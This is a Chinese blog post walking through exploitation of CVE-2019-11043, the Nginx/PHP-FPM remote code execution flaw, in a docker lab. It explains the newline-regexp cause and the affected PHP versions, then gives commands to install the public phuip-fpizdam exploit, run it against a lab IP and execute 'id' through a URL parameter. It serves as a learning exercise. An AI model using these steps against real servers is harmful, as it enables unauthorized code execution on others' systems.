CVE-2019-11043 简单利用

张漏洞利用 4年前

4.04W 0

CVE-2019-11043 是一个远程代码执行漏洞，使用某些特定配置的 Nginx PHP-FPM 的服务器存在漏洞，可允许攻击者远程执行代码。向Nginx PHP-FPM的服务器 URL发送时，服务器返回异常。攻击者可以使用换行符（％0a）来破坏fastcgi_split_path_info指令中的Regexp。Regexp被损坏导致PATH_INFO为空，从而触发该漏洞。

影响范围

在 Nginx PHP-FPM 环境下，当启用了上述 Nginx 配置后，以下 PHP 版本受本次漏洞影响：
PHP 7.0
PHP 7.1
PHP 7.2
PHP 7.3

漏洞利用

首先访问漏洞环境，漏洞环境是用docker搭建的。

CVE-2019-11043 简单利用

攻击机是kali，攻击脚本是go语言写的所以要有go环境，从github上下载exp

go get github.com/neex/phuip-fpizdam
go install github.com/neex/phuip-fpizdam

CVE-2019-11043 简单利用

执行上面命令后，目录下就会生成 phuip-fpizdam 文件，然后执行攻击命令
./phuip-fpizdam

http://192.168.123.49:8080/index.php

CVE-2019-11043 简单利用

在浏览器输入执行命令，查看当前id
http://192.168.123.49:8080/?a=id

CVE-2019-11043 简单利用

很明显攻击成功了，当前用户是www-data 还需要进一步提取呀！

注：本实验不得用于商业用途,仅做学习交流，一切后果自行承担。

CVE-2019-11043(2),简单利用(29),执行漏洞(6),漏洞利用(21),远程代码(3)

本文原创，作者：张，其版权均为华盟网所有。如需转载，请注明出处：https://www.77169.net/html/264403.html

官方

张

1.49K篇文章 67.25M总阅读量

上一篇：那个把推特搞了诈骗比特币的黑客被抓了！年仅17岁下一篇：佳明给勒索病支付数百万美元“赎金”，该不该罚？

CVE-2019-11043 简单利用

相关文章

CVE-2020-11890 简单利用

记一次找回靶机的密码

思科多款统一通信设备存在Struts 2漏洞美安全公司Rapid7称捕获了两次来自中国的攻击

发表评论取消回复

相关文章

CVE-2020-11890 简单利用

记一次找回靶机的密码

思科多款统一通信设备存在Struts 2漏洞 美安全公司Rapid7称捕获了两次来自中国的攻击

发表评论 取消回复

思科多款统一通信设备存在Struts 2漏洞美安全公司Rapid7称捕获了两次来自中国的攻击

发表评论取消回复